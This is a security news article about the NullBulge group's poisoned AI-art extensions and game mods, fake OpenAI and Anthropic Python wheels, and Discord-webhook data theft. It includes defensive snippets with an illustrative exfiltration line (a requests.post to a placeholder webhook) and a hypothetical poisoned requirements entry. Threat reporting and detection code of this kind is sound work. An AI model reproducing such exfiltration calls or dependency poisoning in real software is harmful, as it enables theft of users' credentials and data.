NullBulge Group Targets AI and Gaming Communities with Innovative Malware Attacks


According to SentinelOne’s SentinelLabs, a new threat actor, the NullBulge group, emerged between April and June 2024, targeting users in AI-centric application and gaming communities. Operating under the guise of activism and claiming to protect artists from AI, the group has deployed creative and sophisticated methods to distribute malware, revealing motives that appear to extend beyond its proclaimed anti-AI cause.
Malware Campaigns and Distribution Methods
NullBulge has focused on targeting extensions and modifications for widely used AI-art applications and games, delivering a variety of malware payloads. Their primary method is “poisoning the well”: injecting malicious code into legitimate software distribution channels. They exploit trusted platforms such as GitHub, Reddit, and Hugging Face to maximize their reach, announcing their exploits via their own DLS/blog site and occasionally in 4chan threads.
One notable instance involved the compromise of the ComfyUI_LLMVISION extension on GitHub, which distributed Python-based malware that exfiltrates data via a Discord webhook. Similarly, malicious code was distributed through BeamNG mods on Hugging Face and Reddit. These campaigns delivered malware such as AsyncRAT and XWorm.
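Because Discord webhook URLs follow a fixed, recognizable pattern, their presence in an extension or mod source tree is a useful indicator of compromise. A minimal triage sketch (the sample string below is illustrative, not taken from the actual malware) might simply scan source text for embedded webhook endpoints:

```python
import re

# Discord webhook URLs have a fixed shape: a numeric channel ID followed
# by an alphanumeric token. Hard-coded webhooks in third-party code are a
# common exfiltration indicator worth flagging during review.
WEBHOOK_RE = re.compile(
    r"https://(?:discord(?:app)?\.com)/api/webhooks/\d+/[\w-]+"
)

def find_webhooks(source: str) -> list[str]:
    """Return any Discord webhook URLs embedded in the given source text."""
    return WEBHOOK_RE.findall(source)

# Hypothetical snippet resembling an exfiltration call in a poisoned extension.
sample = 'requests.post("https://discord.com/api/webhooks/1234567890/AbCd-eF_gh", json=payload)'
print(find_webhooks(sample))
# → ['https://discord.com/api/webhooks/1234567890/AbCd-eF_gh']
```

Running such a check over downloaded extensions before installation catches the simplest variants of this exfiltration channel, though attackers can of course obfuscate the URL.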
Technical Details and Payloads
The group’s malware often includes customized LockBit ransomware builds, amplifying the impact of their attacks. Their approach typically involves modifying the ‘requirements.txt’ file to pull in custom Python wheels: precompiled, malicious versions of the Anthropic and OpenAI client libraries. For example, the fake OpenAI library (version 1.16.3) included scripts such as Fadmino.py, which harvests and logs browser data, and admin.py, which packages and transmits the data via a Discord webhook.
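The poisoning described above hinges on pointing requirements.txt at attacker-hosted wheels rather than the PyPI index. A simple review step is to flag any requirement entry that resolves outside the index; the sketch below is a hypothetical checker (the example entries, including the URL, are illustrative):

```python
def suspicious_requirements(lines):
    """Flag requirements entries that bypass the PyPI index:
    direct URLs, local wheel files, or VCS references."""
    flagged = []
    for line in lines:
        entry = line.strip()
        if not entry or entry.startswith("#"):
            continue  # skip blanks and comments
        if (entry.startswith(("http://", "https://", "git+"))
                or entry.endswith(".whl")
                or " @ " in entry):  # PEP 508 direct reference
            flagged.append(entry)
    return flagged

reqs = [
    "numpy==1.26.4",
    # Hypothetical poisoned entry mimicking the technique described above:
    "openai @ https://example.com/openai-1.16.3-py3-none-any.whl",
]
print(suspicious_requirements(reqs))
# → ['openai @ https://example.com/openai-1.16.3-py3-none-any.whl']
```

A flagged entry is not necessarily malicious, but any dependency fetched from an arbitrary URL instead of the package index deserves manual inspection before installation.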
In the compromised GitHub repositories, these scripts work in concert to gather sensitive data, including browser login information and system details, and then transmit it to an external server.
Identified Threats and Entities
NullBulge has used various identities to distribute their malicious code. One such identity, AppleBotzz, was used on platforms like GitHub and ModLand, leading to speculation about the true relationship between AppleBotzz and NullBulge. The group claims they compromised the original maintainer of the ComfyUI_LLMVISION GitHub repository, using their credentials to post malicious code.
In a statement, NullBulge clarified their stance, suggesting they were distinct from AppleBotzz. However, there remains skepticism about whether these identities are separate or one and the same.
High-Profile Leaks
The group has also targeted high-profile entities. At the end of June 2024, NullBulge announced a leak of information from Disney, including web publishing certificates and assets from the animated series DuckTales. This was followed by the release of a 1.2TB archive purportedly containing years of Disney’s internal Slack data, obtained through compromised corporate account credentials.
Expert Insights
Ayman Abouelwafa, chief technology officer at Hitachi Vantara, highlighted the importance of a robust infrastructure for GenAI: “Enterprises are clearly jumping on the GenAI bandwagon, which is not surprising, but it’s also clear that the foundation for successful GenAI is not yet fully built to fit the purpose and its full potential cannot be realized. Unlocking the true power of GenAI, however, requires a strong foundation with a robust and secure infrastructure that can handle the demands of this powerful technology.”
Implications and Recommendations
The activities of NullBulge underscore the growing threat of low-barrier-to-entry ransomware and infostealer infections targeting AI-centric games and applications. Their methods, though not novel, exploit an emerging target demographic, raising significant concerns for those working with these technologies.
To mitigate the risks posed by groups like NullBulge, organizations should implement stringent security measures, including secure API key management, thorough code review and verification, and regular monitoring of third-party code sources.
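The code-review and verification step can also be enforced mechanically. Pip’s hash-checking mode, for instance, refuses to install artifacts whose digest does not match a pinned value; the core check is just a digest comparison, sketched below (the byte strings are stand-ins for a real downloaded wheel):

```python
import hashlib

def verify_artifact(data: bytes, expected_sha256: str) -> bool:
    """Compare an artifact's SHA-256 digest against a pinned value,
    analogous to what pip does under --require-hashes."""
    return hashlib.sha256(data).hexdigest() == expected_sha256

wheel_bytes = b"example wheel contents"  # stand-in for a downloaded .whl
pin = hashlib.sha256(wheel_bytes).hexdigest()  # the pinned, trusted digest

print(verify_artifact(wheel_bytes, pin))           # → True
print(verify_artifact(b"tampered contents", pin))  # → False
```

Pinning digests in requirements files means a swapped-in malicious wheel, even one served from a legitimate-looking URL, fails installation rather than executing.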
As the cybersecurity landscape continues to evolve, vigilance and proactive defense strategies remain crucial in combating these sophisticated threat actors.